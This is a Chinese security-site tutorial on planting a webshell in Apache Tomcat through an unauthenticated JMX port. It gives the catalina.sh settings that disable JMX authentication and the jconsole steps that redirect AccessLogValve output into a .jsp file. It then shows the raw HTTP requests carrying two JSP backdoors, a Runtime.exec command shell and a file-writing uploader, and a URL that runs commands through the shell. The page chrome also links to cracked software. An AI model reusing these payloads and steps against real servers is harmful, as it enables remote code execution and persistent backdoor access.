ce安全网绿色资源分享

教程资讯|常用软件|安卓下载|下载排行|最近更新

软件
软件
文章
当前位置:首页网络安全网络安全文章 → Tomcat JMX上传WebShell

Tomcat JMX上传WebShell

时间:2018-08-30 00:01:53人气:作者:本站作者我要评论

1、 配置tomcat启动jconsole到1099端口的配置:

  1. //可以将其设置为无密码访问:
  2. cd /opt/apache-tomcat-8.0.3/bin
  3. vi catalina.sh
  1. Code
  2. # OS specific support. $var _must_ be set to either true or false.添加如下变量:
  3. CATALINA_OPTS="$JAVA_OPTS -Djava.rmi.server.hostname=192.168.1.100 
  4. -Dcom.sun.management.jmxremote.port=1099 
  5. -Dcom.sun.management.jmxremote.authenticate=false 
  6. -Dcom.sun.management.jmxremote.ssl=false"

//重启tomcat:

./shutdown.sh

./startup.sh

2、 本地->运行输入:jconsole
Tomcat JMX上传WebShell

  1. //VM概要中获得tomcat的web主目录 :
  2. Dcatalina.home=/opt/apache-tomcat-8.0.3

//获得/manager/html后台的访问密码:

//上传webshell:

  1. MBeans->Catalina->Valve->localhost->AccessLogValue->操作 可以写入jsp后门:
  2. ../webapps/docs/cesafe.jsp //测试成功
  3. /opt/apache-tomcat-8.0.3/webapps/docs/cesafe.jsp

Tomcat JMX上传WebShell

//使用burpsuite写入cmd后门:

  1. GET /test?<%Runtime.getRuntime().exec(request.getParameter("www.cesafe.com"));%> HTTP/1.1
  2. Host: 192.168.1.100:8080

Code

  1. GET /test?<%@ page language="java" pageEncoding="gbk"%><jsp:directive.page import="java.io.File"></jsp:directive><jsp:directive.page import="java.io.OutputStream"></jsp:directive><jsp:directive.page import="java.io.FileOutputStream"></jsp:directive><% int i=0;String method=request.getParameter("act");if(method!=null&&method.equals("yoco")){String url=request.getParameter("url");String text=request.getParameter("smart");File f=new File(url);if(f.exists()){f.delete();}try{OutputStream o=new FileOutputStream(f);o.write(text.getBytes());o.close();}catch(Exception e){i++;%>0<%}}if(i==0){%>1<%}%><form action='?act=yoco' method='post'><input size="100" value="<%=application.getRealPath("/") %>" name="url"><br><textarea rows="20" cols="80" name="smart"> HTTP/1.1
  2. Cache-Control: max-age=0
  3. Upgrade-Insecure-Requests: 1
  4. User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Maxthon/5.2.3.6000
  5. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
  6. DNT: 1
  7. Accept-Language: zh-CN
  8. Cookie: JSESSIONID=FD5D2DAF6665FC4C3CC90C814757BF97
  9. Connection: close
  10. Content-Length: 2

//访问webshell地址:

  1. http://192.168.1.100:8080/docs/www.cesafe.com.jsp?cmd=id

相关文章

猜你喜欢

  • Ougishi绿色版下载 V4.00 中文版

    2020-06-19 / 561k

  • 谷歌地图下载助手睿智版破解下载 V9.5绿色版

    2020-06-19 / 32.7M

  • OfficeFIX中文破解版V6.110 注册版

    2020-06-19 / 26.8M

  • Plotagraph破解版V1.2.0 免费版 32/64位

    2020-06-19 / 31.5M

  • IP查详细地址工具下载 V1.1 官方免费版

    2020-06-19 / 408K

  • 内存扫把中文版下载V1.97绿色版

    2020-06-19 / 1.3M

网友评论

验证码:

请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!

最新评论

已有人参与,点击查看更多精彩评论

推荐文章

本类推荐

本类热门

热门软件

自动发货软件|淘集集上货助手/尘牛软件 V1.1.4官方版商业贸易 谷歌韩文输入法下载|韩文输入法官方下载|韩文输入法免费下载输入法类 手机办公套件 OfficeSuite Premium 10.9.22251 支持多语免费下载办公软件 PP手机助手下载 V3.7.7 iOS越狱版手机软件 Hidetoolz进程隐藏工具 V3.0 中文免费版桌面工具 Website 2 APK Builder Pro网站转手机apk工具其他应用 电子书drm限制解除工具下载|Ultimate EPubsoft DRM Removal v14.7.2破解版文件管理 速盘SpeedPan双引擎高黑版下载 V1.52 破解版网络存储 Q-Dir|多窗口文件整理工具 v8.37最新版 32位文件管理

关于CE安全网 | 联系方式 | 发展历程 | 版权声明 | 下载帮助(?) | 广告联系 | 网站地图 | 友情链接

Copyright 2019-2029 cesafe.com 【CE安全网】 版权所有 蜀ICP备19039426号-2| 蜀ICP备19039426号-2

声明: 本站为非赢利性网站 不接受任何赞助和广告 所有软件和文章来自互联网 如有异议 请与本站联系 技术支持:ce安全网